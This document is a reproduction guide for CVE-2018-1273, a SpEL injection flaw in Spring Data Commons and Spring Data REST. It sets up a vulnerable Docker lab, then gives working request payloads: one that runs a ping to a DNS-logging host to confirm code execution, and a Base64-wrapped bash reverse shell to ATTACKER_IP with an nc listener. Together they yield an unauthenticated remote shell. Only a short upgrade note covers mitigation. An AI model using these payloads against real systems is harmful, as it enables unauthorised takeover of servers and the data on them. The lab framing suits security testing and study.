- Vulnerability Overview
Spring Data is an open-source umbrella project that simplifies database access and offers cloud-native support.
Spring Data Commons provides shared infrastructure for all Spring Data modules.
In versions ≤ 2.0.5 (and ≤ 1.13.10), user input is passed unsanitized into a SpEL (Spring Expression Language) expression, allowing arbitrary code execution.
Affected Versions
• Spring Data Commons 1.13 – 1.13.10 (Ingalls SR10)
• Spring Data REST 2.6 – 2.6.10 (Ingalls SR10)
• Spring Data Commons 2.0 – 2.0.5 (Kay SR5)
• Spring Data REST 3.0 – 3.0.5 (Kay SR5)
- Reproduction Environment
Docker image: https://github.com/laoa1573/vuldockerfile
Clone and run:
git clone https://github.com/laoa1573/vuldockerfile
cd vuldockerfile/CVE-2018-1273
docker build -t cve-2018-1273 .
docker run -p 8080:8080 cve-2018-1273- Confirm the Vulnerability
- Browse to
http://localhost:8080/users - Intercept the request (e.g., with Burp Suite).
- Replace the POST body with the following payload to trigger DNS interaction:
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("ping carlhf.dnslog.cn")]=&password=&repeatedPassword=
• Server responds with HTTP 500.
• If your DNS log receives pings, command execution is verified.
- Obtaining a Reverse Shell
Runtime.exec()does not invoke a shell, so special characters (pipes, redirects) are not interpreted.
Usebash -cand Base64-encoded payloads to bypass quoting issues.
Step 1: Prepare your reverse-shell commandbash$IFS$9-i>&/dev/tcp/ATTACKER_IP/ATTACKER_PORT<&1
(where $IFS$9 is an IFS-based whitespace trick)
Step 2: Base64-encode the command
Visit http://www.jackson-t.ca/runtime-exec-payloads.html or use:$ echo -n 'bash$IFS$9-i>&/dev/tcp/ATTACKER_IP/ATTACKER_PORT<&1' | base64
Example result:YmFzaCRJRlMkOS1pPiYvZGV2L3RjcC8xOTIuMTY4LjEuMTAwLzQ0NDQ8JjE=
Step 3: Final payload (Base64 inside Base64 to avoid double quotes)username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("bash -c {echo,YmFzaCRJRlMkOS1pPiYvZGV2L3RjcC8xOTIuMTY4LjEuMTAwLzQ0NDQ8JjE=}|{base64,-d}|{bash,-i}")]=&password=&repeatedPassword=
- Result
• Target connects back to your listener:
nc -lvnp 4444
You now have an unauthenticated remote shell as the user running the Spring application.
- Mitigation / Fix
Upgrade to at least:
• Spring Data Commons 2.0.6 / 1.13.11
• Spring Data REST 3.0.6 / 2.6.11
